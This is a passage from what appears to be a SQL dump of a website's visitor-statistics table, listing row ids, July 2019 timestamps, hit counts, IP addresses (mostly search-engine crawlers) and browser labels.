,0,'66.249.66.132','chrome'),(436168,1563477159,1,1,0,0,'66.249.66.220','chrome'),(436169,1563477324,1,1,0,0,'66.249.66.218','chrome'),(436170,1563477874,1,1,0,0,'157.55.39.70','other'),(436171,1563478463,1,1,0,0,'157.55.39.197','other'),(436172,1563478901,1,1,0,0,'141.8.188.29','other'),(436173,1563479264,2,2,0,0,'40.77.167.15','other'),(436174,1563479287,2,2,0,0,'40.77.167.161','other'),(436175,1563479333,1,1,0,0,'8.29.198.25','other'),(436176,1563480046,1,1,0,0,'37.73.188.247','chrome'),(436177,1563480418,1,1,0,0,'91.209.11.236','other'),(436178,1563480464,1,1,0,0,'66.249.66.220','chrome'),(436179,1563480484,1,1,0,0,'157.55.39.70','other'),(436180,1563480729,1,1,0,0,'13.66.139.0','other'),(436181,1563481172,1,1,0,0,'8.29.198.27','other'),(436182,1563481700,1,1,0,0,'141.8.188.29','other'),(436183,1563481996,1,1,0,0,'180.76.15.148','other'),(436184,1563482056,1,1,0,0,'66.249.66.218','chrome'),(436185,1563482112,1,1,0,0,'157.55.39.70','other'),(436186,1563482218,1,1,0,0,'207.46.13.97','other'),(436187,1563483038,1,1,0,0,'141.8.188.29','other'),(436188,1563483851,1,1,0,0,'66.249.66.218','chrome'),(436189,1563483864,1,1,0,0,'66.249.66.220','chrome'),(436190,1563485325,1,1,0,0,'157.55.39.2','other'),(436191,1563486920,1,1,0,0,'207.46.13.97','other'),(436192,1563487235,1,1,0,0,'157.55.39.70','other'),(436193,1563487358,2,2,0,0,'66.249.66.220','chrome'),(436194,1563487779,2,2,0,0,'66.249.66.222','chrome'),(436195,1563487944,1,1,0,0,'66.249.66.128','chrome'),(436196,1563488620,1,1,0,0,'207.46.13.97','other'),(436197,1563489951,1,1,0,0,'141.8.188.29','other'),(436198,1563490187,1,1,0,0,'8.29.198.27','other'),(436199,1563490332,1,1,0,0,'180.76.15.15','other'),(436200,1563490351,1,1,0,0,'37.145.10.63','msie'),(436201,1563491490,1,1,0,0,'141.8.188.29','other'),(436202,1563491652,1,1,0,0,'207.46.13.97','other'),(436203,1563491658,1,1,0,0,'40.77.167.39','other'),(436204,1563491834,1,1,0,0,'66.249.66.128','chrome'),(436205,1563492011,1,1,0,0,'8.29.198.25','other'),(436206,1563492478,2,2,0,0,'66.249.66.222','chrome'),(436207,1563493611,4,4,0,0,'66.249.66.218','chrome'),(436208,1563493822,1,1,0,0,'157.55.39.2','other'),(436209,1563494354,2,2,0,0,'66.249.66.220','chrome'),(436210,1563494394,1,1,0,0,'66.249.66.132','chrome'),(436211,1563494396,1,1,0,0,'207.46.13.119','other'),(436212,1563494820,1,1,0,0,'66.249.66.222','chrome'),(436213,1563495087,1,1,0,0,'141.8.188.29','other'),(436214,1563496026,1,1,0,0,'66.249.66.218','chrome'),(436215,1563497095,1,1,0,0,'66.249.66.220','chrome'),(436216,1563497112,1,1,0,0,'66.249.66.218','chrome'),(436217,1563497367,1,1,0,0,'178.255.215.94','other'),(436218,1563499523,1,1,0,0,'207.46.13.119','other'),(436219,1563500501,1,1,0,0,'40.77.167.39','other'),(436220,1563501036,1,1,0,0,'8.29.198.25','other'),(436221,1563501242,1,1,0,0,'66.249.66.222','chrome'),(436222,1563501282,1,1,0,0,'157.55.39.2','other'),(436223,1563501491,1,1,0,0,'178.255.215.94','other'),(436224,1563501505,1,1,0,0,'207.46.13.119','other'),(436225,1563502243,1,1,0,0,'40.77.167.175','other'),(436226,1563502638,1,0,1,0,'66.249.66.220',''),(436227,1563502660,1,1,0,0,'66.249.66.218','chrome'),(436228,1563502853,1,1,0,0,'8.29.198.27','other'),(436229,1563503191,1,1,0,0,'40.77.167.59','other'),(436230,1563503583,1,1,0,0,'157.55.39.2','other'),(436231,1563503647,1,1,0,0,'66.249.66.220','chrome'),(436232,1563504529,1,1,0,0,'141.8.188.29','other'),(436233,1563505807,1,1,0,0,'18.203.162.85','chrome'),(436234,1563506049,1,1,0,0,'141.8.188.29','other'),(436235,1563506808,1,1,0,0,'207.46.13.152','other'),(436236,1563507310,1,1,0,0,'207.46.13.119','other'),(436237,1563507963,1,1,0,0,'31.184.238.211','chrome'),(436238,1563508905,1,1,0,0,'207.46.13.119','other'),(436239,1563509557,1,1,0,0,'141.8.188.29','other'),(436240,1563509647,1,1,0,0,'176.110.134.2','chrome'),(436241,1563509663,1,1,0,0,'94.29.73.233','chrome'),(436242,1563510114,1,1,0,0,'207.46.13.152','other'),(436243,1563510516,3,3,0,0,'141.8.188.29','other'),(436244,1563511880,1,1,0,0,'8.29.198.25','other'),(436245,1563512101,1,1,0,0,'207.46.13.20','other'),(436246,1563513695,1,1,0,0,'8.29.198.27','other'),(436247,1563515335,1,1,0,0,'91.196.178.74','chrome'),(436248,1563515801,1,1,0,0,'192.42.116.16','other'),(436249,1563519529,1,1,0,0,'40.77.167.54','other'),(436250,1563519680,1,1,0,0,'18.237.243.130','firefox'),(436251,1563520129,1,1,0,0,'195.58.249.162','chrome'),(436252,1563520487,1,1,0,0,'66.249.66.220','chrome'),(436253,1563520601,2,2,0,0,'40.77.167.54','other'),(436254,1563521032,1,1,0,0,'207.46.13.152','other'),(436255,1563521036,1,1,0,0,'40.77.167.116','other'),(436256,1563522371,1,1,0,0,'207.46.13.152','other'),(436257,1563522413,3,3,0,0,'141.8.188.29','other'),(436258,1563522723,1,1,0,0,'8.29.198.26','other'),(436259,1563522727,1,1,0,0,'209.17.96.218','other'),(436260,1563522883,1,1,0,0,'40.77.167.116','other'),(436261,1563523160,1,1,0,0,'207.46.13.20','other'),(436262,1563524541,1,1,0,0,'8.29.198.27','other'),(436263,1563524629,2,2,0,0,'207.46.13.20','other'),(436264,1563525112,1,1,0,0,'173.252.87.9','chrome'),(436265,1563525254,1,1,0,0,'13.66.139.0','other'),(436266,1563525997,2,2,0,0,'207.46.13.20','other'),(436267,1563526106,1,1,0,0,'66.249.66.220','chrome'),(436268,1563526443,1,1,0,0,'91.196.178.169','chrome'),(436269,1563526716,1,1,0,0,'40.77.167.116','other'),(436270,1563526848,1,1,0,0,'66.249.66.130','chrome'),(436271,1563526984,1,1,0,0,'93.80.129.106','msie'),(436272,1563526987,1,1,0,0,'128.72.182.199','msie'),(436273,1563527273,1,1,0,0,'91.196.177.46','firefox'),(436274,1563527287,1,1,0,0,'66.249.66.222','chrome'),(436275,1563528092,1,1,0,0,'40.77.167.116','other'),(436276,1563528442,1,1,0,0,'141.8.188.29','other'),(436277,1563529066,1,1,0,0,'91.196.178.187','chrome'),(436278,1563529163,1,1,0,0,'40.77.167.107','other'),(436279,1563530345,1,1,0,0,'40.77.167.116','other'),(436280,1563530403,1,1,0,0,'141.8.188.29','other'),(436281,1563531040,1,1,0,0,'40.77.167.207','other'),(436282,1563531416,1,1,0,0,'40.77.167.107','other'),(436283,1563531871,1,1,0,0,'109.74.154.72','chrome'),(436284,1563532028,3,3,0,0,'141.8.188.29','other'),(436285,1563532127,1,1,0,0,'207.46.13.220','other'),(436286,1563532696,1,1,0,0,'66.249.66.222','chrome'),(436287,1563532880,1,1,0,0,'40.77.167.133','other'),(436288,1563533494,1,1,0,0,'40.77.167.107','other'),(436289,1563533581,1,1,0,0,'8.29.198.26','other'),(436290,1563534624,1,1,0,0,'207.46.13.67','other'),(436291,1563535036,1,1,0,0,'40.77.167.68','other'),(436292,1563535378,1,1,0,0,'40.77.167.65','other'),(436293,1563535384,1,1,0,0,'8.29.198.26','other'),(436294,1563535882,1,1,0,0,'207.46.13.6','other'),(436295,1563535985,1,1,0,0,'178.133.165.24','chrome'),(436296,1563536470,1,1,0,0,'40.77.167.68','other'),(436297,1563536479,1,1,0,0,'66.249.66.220','chrome'),(436298,1563536726,1,1,0,0,'40.77.167.65','other'),(436299,1563537057,2,2,0,0,'207.46.13.122','other'),(436300,1563538171,1,1,0,0,'180.76.15.155','other'),(436301,1563538798,1,1,0,0,'207.46.13.122','other'),(436302,1563538808,1,1,0,0,'193.106.30.99','chrome'),(436303,1563539035,1,1,0,0,'157.55.39.163','other'),(436304,1563539673,1,1,0,0,'66.249.66.132','chrome'),(436305,1563539949,1,1,0,0,'66.249.66.218','chrome'),(436306,1563540211,1,1,0,0,'66.249.66.128','chrome'),(436307,1563540763,3,3,0,0,'207.46.13.97','other'),(436308,1563540781,4,4,0,0,'141.8.188.29','other'),(436309,1563540877,1,1,0,0,'180.76.15.147','other'),(436310,1563542018,2,2,0,0,'157.55.39.163','other'),(436311,1563542165,1,1,0,0,'141.8.188.29','other'),(436312,1563542877,1,1,0,0,'180.76.15.11','other'),(436313,1563542948,1,1,0,0,'207.46.13.97','other'),(436314,1563544050,1,1,0,0,'157.55.39.163','other'),(436315,1563544080,1,1,0,0,'60.191.38.77','firefox'),(436316,1563544420,1,1,0,0,'8.29.198.26','other'),(436317,1563544888,1,1,0,0,'40.77.167.65','other'),(436318,1563545092,1,1,0,0,'157.55.39.163','other'),(436319,1563545466,1,1,0,0,'207.46.13.122','other'),(436320,1563545856,2,2,0,0,'141.8.188.29','other'),(436321,1563545972,1,1,0,0,'66.249.66.130','chrome'),(436322,1563545974,1,0,1,0,'66.249.66.132',''),(436323,1563546216,1,1,0,0,'8.29.198.25','other'),(436324,1563546760,1,1,0,0,'66.249.66.220','chrome'),(436325,1563546763,1,1,0,0,'207.46.13.122','other'),(436326,1563547607,2,2,0,0,'40.77.167.65','other'),(436327,1563548139,1,1,0,0,'157.55.39.163','other'),(436328,1563548697,1,1,0,0,'66.249.66.128','chrome'),(436329,1563548985,1,1,0,0,'207.46.13.97','other'),(436330,1563549035,1,1,0,0,'37.73.5.31','chrome'),(436331,1563549322,1,1,0,0,'66.249.66.220','chrome'),(436332,1563550681,3,3,0,0,'207.46.13.122','other'),(436333,1563551117,1,1,0,0,'66.249.66.130','chrome'),(436334,1563551428,4,4,0,0,'141.8.188.29','other'),(436335,1563551674,1,1,0,0,'157.55.39.203','other'),(436336,1563553304,1,1,0,0,'157.55.39.203','other'),(436337,1563553834,2,2,0,0,'141.8.188.29','other'),(436338,1563554689,1,1,0,0,'66.249.66.128','chrome'),(436339,1563554937,1,1,0,0,'207.46.13.116','other'),(436340,1563555118,1,1,0,0,'141.8.188.29','other'),(436341,1563555293,1,1,0,0,'8.29.198.27','other'),(436342,1563556323,1,1,0,0,'157.55.39.163','other'),(436343,1563556331,1,1,0,0,'91.196.178.187','chrome'),(436344,1563556537,1,1,0,0,'40.77.167.138','other'),(436345,1563556875,1,1,0,0,'141.8.188.29','other'),(436346,1563557074,1,1,0,0,'8.29.198.26','other'),(436347,1563558407,2,2,0,0,'157.55.39.203','other'),(436348,1563558809,1,1,0,0,'91.209.11.236','other'),(436349,1563559648,1,1,0,0,'157.55.39.163','other'),(436350,1563559779,1,1,0,0,'40.77.167.138','other'),(436351,1563560245,1,1,0,0,'66.249.66.130','chrome'),(436352,1563562332,1,1,0,0,'91.209.11.236','other'),(436353,1563562848,2,2,0,0,'207.46.13.247','other'),(436354,1563563269,1,1,0,0,'141.8.188.29','other'),(436355,1563565810,2,2,0,0,'91.196.178.94','firefox'),(436356,1563566134,1,1,0,0,'8.29.198.26','other'),(436357,1563566782,1,1,0,0,'207.46.13.247','other'),(436358,1563567098,2,2,0,0,'141.8.188.29','other'),(436359,1563567229,1,1,0,0,'180.76.15.160','other'),(436360,1563567708,2,2,0,0,'207.46.13.36','other'),(436361,1563567916,1,1,0,0,'8.29.198.26','other'),(436362,1563569169,1,1,0,0,'66.249.66.128','chrome'),(436363,1563569536,1,1,0,0,'157.55.39.116','other'),(436364,1563570276,1,1,0,0,'141.8.188.29','other'),(436365,1563571957,1,1,0,0,'207.46.13.36','other'),(436366,1563574085,1,1,0,0,'207.46.13.36','other'),(436367,1563574414,1,1,0,0,'40.77.167.72','other'),(436368,1563574586,2,2,0,0,'207.46.13.247','other'),(436369,1563574742,1,1,0,0,'157.55.39.237','other'),(436370,1563575765,1,1,0,0,'107.178.238.30','firefox'),(436371,1563575996,1,1,0,0,'209.17.96.42','other'),(436372,1563576613,1,1,0,0,'207.46.13.247','other'),(436373,1563576617,3,3,0,0,'157.55.39.237','other'),(436374,1563576623,1,1,0,0,'40.77.167.72','other'),(436375,1563576980,1,1,0,0,'8.29.198.26','other'),(436376,1563577524,1,1,0,0,'46.147.139.133','msie'),(436377,1563578253,1,1,0,0,'141.8.188.29','other'),(436378,1563578478,1,1,0,0,'157.55.39.176','other'),(436379,1563578769,1,1,0,0,'8.29.198.25','other'),(436380,1563578803,1,1,0,0,'40.77.167.72','other'),(436381,1563581134,1,1,0,0,'157.55.39.176','other'),(436382,1563581925,1,1,0,0,'207.46.13.144','other'),(436383,1563584371,208,208,0,0,'5.9.61.101','other'),(436384,1563586029,2,2,0,0,'207.46.13.144','other'),(436385,1563586371,2,2,0,0,'40.77.167.20','other'),(436386,1563587269,1,1,0,0,'66.249.66.218','chrome'),(436387,1563587864,1,1,0,0,'8.29.198.25','other'),(436388,1563588774,1,1,0,0,'40.77.167.20','other'),(436389,1563588865,1,1,0,0,'66.249.66.218','chrome'),(436390,1563589617,1,1,0,0,'8.29.198.27','other'),(436391,1563590862,1,1,0,0,'52.39.106.170','other'),(436392,1563594701,1,1,0,0,'207.46.13.110','other'),(436393,1563595687,1,1,0,0,'141.8.188.29','other'),(436394,1563596280,1,1,0,0,'92.113.156.60','chrome'),(436395,1563596427,1,1,0,0,'207.46.13.96','other'),(436396,1563596951,1,1,0,0,'66.249.66.220','chrome'),(436397,1563597615,1,1,0,0,'157.55.39.135','other'),(436398,1563597993,1,1,0,0,'207.46.13.203','other'),(436399,1563598634,1,1,0,0,'207.46.13.122','other'),(436400,1563598707,1,1,0,0,'8.29.198.27','other'),(436401,1563599517,1,1,0,0,'207.46.13.110','other'),(436402,1563599668,1,1,0,0,'198.204.243.138','other'),(436403,1563600011,1,1,0,0,'95.216.19.59','other'),(436404,1563600460,1,1,0,0,'8.29.198.27','other'),(436405,1563601170,2,2,0,0,'141.8.188.29','other'),(436406,1563601209,1,1,0,0,'157.55.39.135','other'),(436407,1563601559,1,1,0,0,'207.46.13.110','other'),(436408,1563601712,1,1,0,0,'37.187.129.166','other'),(436409,1563603491,1,1,0,0,'207.46.13.110','other'),(436410,1563604660,1,1,0,0,'207.46.13.110','other'),(436411,1563604860,1,1,0,0,'141.8.188.29','other'),(436412,1563606531,1,1,0,0,'141.8.188.29','other'),(436413,1563607358,2,2,0,0,'157.55.39.168','other'),(436414,1563607399,2,2,0,0,'207.46.13.122','other'),(436415,1563607403,2,2,0,0,'40.77.167.164','other'),(436416,1563607413,1,1,0,0,'207.46.13.110','other'),(436417,1563608884,1,1,0,0,'207.46.13.122','other'),(436418,1563609554,1,1,0,0,'8.29.198.26','other'),(436419,1563609958,2,2,0,0,'207.46.13.122','other'),(436420,1563610279,1,1,0,0,'46.211.100.98','chrome'),(436421,1563611297,1,1,0,0,'8.29.198.26','other'),(436422,1563612106,1,1,0,0,'207.46.13.110','other'),(436423,1563612111,1,1,0,0,'157.55.39.168','other'),(436424,1563612115,3,3,0,0,'207.46.13.122','other'),(436425,1563612198,2,2,0,0,'40.77.167.164','other'),(436426,1563613645,1,1,0,0,'66.249.66.218','chrome'),(436427,1563615252,1,1,0,0,'40.77.167.120','other'),(436428,1563616022,1,1,0,0,'141.8.188.29','other'),(436429,1563616677,1,1,0,0,'66.249.66.218','chrome'),(436430,1563616748,1,1,0,0,'40.77.167.107','other'),(436431,1563617370,1,1,0,0,'40.77.167.141','other'),(436432,1563617829,1,1,0,0,'91.196.177.46','firefox'),(436433,1563617875,1,1,0,0,'109.74.154.72','chrome'),(436434,1563617925,1,1,0,0,'40.77.167.107','other'),(436435,1563618620,1,1,0,0,'141.8.188.29','other'),(436436,1563618937,1,1,0,0,'51.68.152.26','chrome'),(436437,1563620416,1,1,0,0,'8.29.198.26','other'),(436438,1563620605,1,1,0,0,'207.46.13.204','other'),(436439,1563621019,1,1,0,0,'46.211.103.112','chrome'),(436440,1563621303,1,1,0,0,'13.66.139.0','other'),(436441,1563622141,1,1,0,0,'8.29.198.26','other'),(436442,1563622503,2,2,0,0,'40.77.167.142','other'),(436443,1563623827,1,1,0,0,'46.211.134.26','chrome'),(436444,1563624106,1,1,0,0,'207.46.13.204','other'),(436445,1563624489,1,1,0,0,'66.249.66.220','chrome'),(436446,1563625100,1,1,0,0,'40.77.167.93','other'),(436447,1563627845,1,1,0,0,'66.249.66.132','chrome'),(436448,1563627885,1,1,0,0,'91.209.11.236','other'),(436449,1563629591,1,1,0,0,'157.55.39.113','other'),(436450,1563630324,1,1,0,0,'40.77.167.141','other'),(436451,1563630348,1,1,0,0,'66.249.66.128','chrome'),(436452,1563630646,1,1,0,0,'95.128.74.222','chrome'),(436453,1563630674,2,2,0,0,'207.46.13.204','other'),(436454,1563631261,1,1,0,0,'8.29.198.25','other'),(436455,1563632279,2,2,0,0,'60.191.38.77','firefox'),(436456,1563632353,1,1,0,0,'207.46.13.204','other'),(436457,1563632985,1,1,0,0,'8.29.198.26','other'),(436458,1563633701,1,1,0,0,'66.249.66.218','chrome'),(436459,1563633788,3,3,0,0,'207.46.13.204','other'),(436460,1563634768,1,1,0,0,'141.8.188.29','other'),(436461,1563635973,1,1,0,0,'207.46.13.1','other'),(436462,1563636175,1,1,0,0,'157.55.39.113','other'),(436463,1563636230,1,1,0,0,'93.80.234.159','msie'),(436464,1563636319,1,1,0,0,'91.196.178.165','chrome'),(436465,1563637043,2,2,0,0,'157.55.39.155','other'),(436466,1563637517,2,2,0,0,'207.46.13.45','other'),(436467,1563638050,1,1,0,0,'157.55.39.155','other'),(436468,1563638548,1,1,0,0,'141.8.188.29','other'),(436469,1563639634,4,4,0,0,'141.8.188.29','other'),(436470,1563640384,1,1,0,0,'91.196.178.184','chrome'),(436471,1563641050,1,1,0,0,'66.249.66.130','chrome'),(436472,1563641052,1,1,0,0,'207.46.13.220','other'),(436473,1563641347,1,1,0,0,'157.55.39.155','other'),(436474,1563641523,2,2,0,0,'207.46.13.204','other'),(436475,1563641705,57,57,0,0,'185.6.9.220','other'),(436476,1563641720,70,70,0,0,'185.6.8.2','other'),(436477,1563642114,1,1,0,0,'8.29.198.26','other'),(436478,1563642614,78,78,0,0,'185.6.9.220','other'),(436479,1563642643,53,53,0,0,'185.6.8.2','other'),(436480,1563643516,59,59,0,0,'185.6.9.220','other'),(436481,1563643534,1,1,0,0,'207.46.13.204','other'),(436482,1563643554,80,80,0,0,'185.6.8.2','other'),(436483,1563643570,1,1,0,0,'157.55.39.248','other'),(436484,1563643837,1,1,0,0,'8.29.198.25','other'),(436485,1563644456,70,70,0,0,'185.6.8.2','other'),(436486,1563644463,57,57,0,0,'185.6.9.220','other'),(436487,1563644548,1,1,0,0,'66.249.66.218','chrome'),(436488,1563644579,1,1,0,0,'66.249.66.220','chrome'),(436489,1563644601,1,1,0,0,'141.8.188.29','other'),(436490,1563644851,1,1,0,0,'157.55.39.248','other'),(436491,1563645366,58,58,0,0,'185.6.9.220','other'),(436492,1563645386,67,67,0,0,'185.6.8.2','other'),(436493,1563646224,1,1,0,0,'66.249.66.222','chrome'),(436494,1563646269,72,72,0,0,'185.6.9.220','other'),(436495,1563646292,70,70,0,0,'185.6.8.2','other'),(436496,1563646604,1,1,0,0,'141.8.188.29','other'),(436497,1563647176,69,69,0,0,'185.6.9.220','other'),(436498,1563647209,69,69,0,0,'185.6.8.2','other'),(436499,1563647446,1,1,0,0,'46.211.133.110','chrome'),(436500,1563647498,1,1,0,0,'93.74.7.45','chrome'),(436501,1563648087,60,60,0,0,'185.6.9.220','other'),(436502,1563648121,73,73,0,0,'185.6.8.2','other'),(436503,1563648157,1,1,0,0,'40.77.167.75','other'),(436504,1563648989,62,62,0,0,'185.6.9.220','other'),(436505,1563649027,73,73,0,0,'185.6.8.2','other'),(436506,1563649300,3,3,0,0,'141.8.188.29','other'),(436507,1563649326,1,1,0,0,'207.46.13.41','other'),(436508,1563649904,38,38,0,0,'185.6.9.220','other'),(436509,1563649951,22,22,0,0,'185.6.8.2','other'),(436510,1563649964,1,1,0,0,'66.249.66.222','chrome'),(436511,1563651007,1,1,0,0,'207.46.13.8','other'),(436512,1563651814,3,3,0,0,'141.8.188.29','other'),(436513,1563652856,1,1,0,0,'141.8.188.29','other'),(436514,1563652958,1,1,0,0,'8.29.198.27','other'),(436515,1563653365,1,1,0,0,'207.46.13.8','other'),(436516,1563654690,1,1,0,0,'8.29.198.25','other'),(436517,1563655109,1,1,0,0,'40.77.167.56','other'),(436518,1563656073,1,1,0,0,'40.77.167.75','other'),(436519,1563656444,1,1,0,0,'66.249.66.220','chrome'),(436520,1563657011,1,1,0,0,'40.77.167.56','other'),(436521,1563657926,1,1,0,0,'40.77.167.128','other'),(436522,1563658933,1,1,0,0,'178.17.171.194','chrome'),(436523,1563660227,1,1,0,0,'40.77.167.179','other'),(436524,1563660632,1,1,0,0,'40.77.167.56','other'),(436525,1563660880,1,1,0,0,'157.55.39.92','other'),(436526,1563661831,1,1,0,0,'40.77.167.128','other'),(436527,1563662969,1,1,0,0,'141.8.188.29','other'),(436528,1563663797,1,1,0,0,'8.29.198.26','other'),(436529,1563664055,1,1,0,0,'141.8.188.29','other'),(436530,1563664405,1,1,0,0,'66.249.66.220','chrome'),(436531,1563664564,2,2,0,0,'40.77.167.128','other'),(436532,1563664822,1,1,0,0,'40.77.167.56','other'),(436533,1563665538,1,1,0,0,'8.29.198.27','other'),(436534,1563667043,1,1,0,0,'157.55.39.130','other'),(436535,1563670320,1,1,0,0,'66.249.66.218','chrome'),(436536,1563670514,1,1,0,0,'35.160.114.95','other'),(436537,1563670675,1,1,0,0,'40.77.167.8','other'),(436538,1563671358,1,1,0,0,'207.46.13.67','other'),(436539,1563672110,4,4,0,0,'141.8.188.29','other'),(436540,1563672357,1,1,0,0,'207.46.13.67','other'),(436541,1563672482,1,1,0,0,'180.76.15.142','other'),(436542,1563672951,1,1,0,0,'157.55.39.130','other'),(436543,1563674639,1,1,0,0,'8.29.198.26','other'),(436544,1563674781,1,1,0,0,'207.46.13.119','other'),(436545,1563675417,2,2,0,0,'207.46.13.67','other'),(436546,1563676366,1,1,0,0,'207.46.13.67','other'),(436547,1563676387,1,1,0,0,'8.29.198.26','other'),(436548,1563678054,1,1,0,0,'180.76.15.148','other'),(436549,1563679698,1,1,0,0,'40.77.167.8','other'),(436550,1563680315,1,1,0,0,'66.249.66.222','chrome'),(436551,1563681176,1,1,0,0,'40.77.167.196','other'),(436552,1563681336,1,1,0,0,'141.8.188.29','other'),(436553,1563681652,2,2,0,0,'157.55.39.100','other'),(436554,1563682568,1,1,0,0,'141.8.188.29','other'),(436555,1563682825,1,1,0,0,'66.249.66.220','chrome'),(436556,1563683580,1,1,0,0,'157.55.39.100','other'),(436557,1563684171,2,2,0,0,'40.77.167.196','other'),(436558,1563684369,2,2,0,0,'141.8.188.29','other'),(436559,1563684381,1,1,0,0,'207.46.13.134','other'),(436560,1563685476,1,1,0,0,'8.29.198.25','other'),(436561,1563685866,1,1,0,0,'178.255.215.94','other'),(436562,1563686032,2,2,0,0,'141.8.188.29','other'),(436563,1563686277,1,1,0,0,'157.55.39.100','other'),(436564,1563687226,1,1,0,0,'8.29.198.27','other'),(436565,1563688396,1,1,0,0,'109.70.100.29','other'),(436566,1563689291,1,1,0,0,'141.8.188.29','other'),(436567,1563689573,1,1,0,0,'157.55.39.100','other'),(436568,1563690325,1,1,0,0,'40.77.167.196','other'),(436569,1563690542,1,1,0,0,'207.46.13.1','other'),(436570,1563691017,2,2,0,0,'157.55.39.100','other'),(436571,1563691132,1,1,0,0,'185.234.219.17','chrome'),(436572,1563691640,1,1,0,0,'157.55.39.230','other'),(436573,1563692447,1,1,0,0,'207.46.13.1','other'),(436574,1563692628,1,1,0,0,'141.8.188.29','other'),(436575,1563692960,1,1,0,0,'157.55.39.209','other'),(436576,1563693476,2,2,0,0,'207.46.13.1','other'),(436577,1563693529,1,1,0,0,'37.73.120.43','chrome'),(436578,1563693634,1,1,0,0,'141.8.188.29','other'),(436579,1563693856,1,1,0,0,'178.140.104.173','msie'),(436580,1563693861,1,1,0,0,'128.72.182.199','msie'),(436581,1563696028,1,1,0,0,'66.249.66.220','chrome'),(436582,1563696302,2,2,0,0,'66.249.66.222','chrome'),(436583,1563696314,1,1,0,0,'40.77.167.166','other'),(436584,1563696317,1,1,0,0,'8.29.198.27','other'),(436585,1563696696,1,1,0,0,'91.209.11.236','other'),(436586,1563696904,1,1,0,0,'207.46.13.1','other'),(436587,1563697174,2,2,0,0,'157.55.39.100','other'),(436588,1563697915,1,1,0,0,'157.55.39.230','other'),(436589,1563698059,1,1,0,0,'8.29.198.25','other'),(436590,1563698536,1,1,0,0,'207.46.13.1','other'),(436591,1563701438,1,1,0,0,'157.55.39.100','other'),(436592,1563702021,1,1,0,0,'188.165.225.106','firefox'),(436593,1563702692,1,1,0,0,'207.46.13.1','other'),(436594,1563703139,1,1,0,0,'66.249.66.222','chrome'),(436595,1563703961,1,1,0,0,'207.46.13.1','other'),(436596,1563704263,4,4,0,0,'141.8.188.29','other'),(436597,1563704537,1,1,0,0,'109.74.154.72','chrome'),(436598,1563704761,1,1,0,0,'207.46.13.63','other'),(436599,1563704812,1,1,0,0,'58.250.125.86','other'),(436600,1563705182,1,1,0,0,'40.77.167.173','other'),(436601,1563705362,3,3,0,0,'157.55.39.230','other'),(436602,1563705967,1,1,0,0,'185.9.147.250','firefox'),(436603,1563706283,2,2,0,0,'141.8.188.29','other'),(436604,1563707125,1,1,0,0,'40.77.167.37','other'),(436605,1563707153,1,1,0,0,'8.29.198.25','other'),(436606,1563707527,1,1,0,0,'66.249.66.220','chrome'),(436607,1563707685,1,1,0,0,'141.8.188.29','other'),(436608,1563708895,1,1,0,0,'8.29.198.27','other'),(436609,1563709089,1,1,0,0,'66.249.66.218','chrome'),(436610,1563709363,1,1,0,0,'23.228.90.98','chrome'),(436611,1563709793,1,1,0,0,'40.77.167.173','other'),(436612,1563709798,1,1,0,0,'157.55.39.230','other'),(436613,1563709802,2,2,0,0,'207.46.13.1','other'),(436614,1563710341,2,2,0,0,'141.8.188.29','other'),(436615,1563710471,1,1,0,0,'40.77.167.37','other'),(436616,1563712140,1,1,0,0,'157.55.39.230','other'),(436617,1563713891,1,1,0,0,'141.8.188.29','other'),(436618,1563714073,2,2,0,0,'40.77.167.37','other'),(436619,1563714214,1,1,0,0,'66.249.66.218','chrome'),(436620,1563714303,1,1,0,0,'207.46.13.1','other'),(436621,1563715443,2,2,0,0,'141.8.188.29','other'),(436622,1563716325,1,1,0,0,'180.76.15.34','other'),(436623,1563717449,1,1,0,0,'157.55.39.29','other'),(436624,1563717999,1,1,0,0,'8.29.198.26','other'),(436625,1563718139,1,1,0,0,'40.77.167.37','other'),(436626,1563718499,1,1,0,0,'207.46.13.180','other'),(436627,1563719732,1,1,0,0,'8.29.198.25','other'),(436628,1563719843,1,1,0,0,'66.249.66.218','chrome'),(436629,1563720207,1,1,0,0,'194.156.124.29','chrome'),(436630,1563724235,1,1,0,0,'40.77.167.8','other'),(436631,1563725351,1,1,0,0,'207.46.13.180','other'),(436632,1563725374,1,1,0,0,'40.77.167.8','other'),(436633,1563726772,1,1,0,0,'31.184.238.211','chrome'),(436634,1563726897,1,1,0,0,'66.249.66.220','chrome'),(436635,1563727405,1,1,0,0,'207.46.13.180','other'),(436636,1563727948,1,1,0,0,'40.77.167.8','other'),(436637,1563728053,20,20,0,0,'66.249.66.220','chrome'),(436638,1563728061,28,28,0,0,'66.249.66.218','chrome'),(436639,1563728177,2,2,0,0,'66.249.66.132','chrome'),(436640,1563728428,1,1,0,0,'66.249.66.222','chrome'),(436641,1563728507,1,1,0,0,'157.55.39.85','other'),(436642,1563728835,1,1,0,0,'8.29.198.26','other'),(436643,1563729859,1,1,0,0,'40.77.167.8','other'),(436644,1563730153,1,1,0,0,'157.55.39.85','other'),(436645,1563730585,1,1,0,0,'8.29.198.25','other'),(436646,1563731033,2,2,0,0,'66.249.66.128','chrome'),(436647,1563731136,1,1,0,0,'66.249.66.218','chrome'),(436648,1563731178,1,1,0,0,'66.249.66.130','chrome'),(436649,1563731644,1,1,0,0,'185.177.190.203','firefox'),(436650,1563731718,1,1,0,0,'157.55.39.242','other'),(436651,1563732409,2,2,0,0,'91.196.177.222','chrome'),(436652,1563732952,1,1,0,0,'157.55.39.242','other'),(436653,1563733059,1,1,0,0,'46.211.110.1','chrome'),(436654,1563733454,1,1,0,0,'207.46.13.3','other'),(436655,1563733536,1,1,0,0,'162.144.59.158','firefox'),(436656,1563734593,1,1,0,0,'66.249.66.222','chrome'),(436657,1563735273,1,1,0,0,'141.8.188.29','other'),(436658,1563735897,1,1,0,0,'157.55.39.4','other'),(436659,1563736142,2,2,0,0,'66.249.66.222','chrome'),(436660,1563736201,1,1,0,0,'207.46.13.3','other'),(436661,1563736346,1,1,0,0,'185.234.219.246','chrome'),(436662,1563737271,1,1,0,0,'40.77.167.8','other'),(436663,1563737298,1,1,0,0,'207.46.13.3','other'),(436664,1563738623,1,1,0,0,'157.55.39.4','other'),(436665,1563739529,1,1,0,0,'66.249.66.130','chrome'),(436666,1563739672,1,1,0,0,'8.29.198.25','other'),(436667,1563740850,1,1,0,0,'141.8.188.29','other'),(436668,1563741423,1,1,0,0,'8.29.198.26','other'),(436669,1563742445,1,1,0,0,'141.8.188.29','other'),(436670,1563742541,1,1,0,0,'207.46.13.3','other'),(436671,1563743143,1,1,0,0,'95.24.19.29','msie'),(436672,1563745065,1,1,0,0,'66.249.66.130','chrome'),(436673,1563745069,1,1,0,0,'66.249.66.128','chrome'),(436674,1563745073,1,1,0,0,'66.249.66.222','chrome'),(436675,1563745089,1,1,0,0,'66.249.66.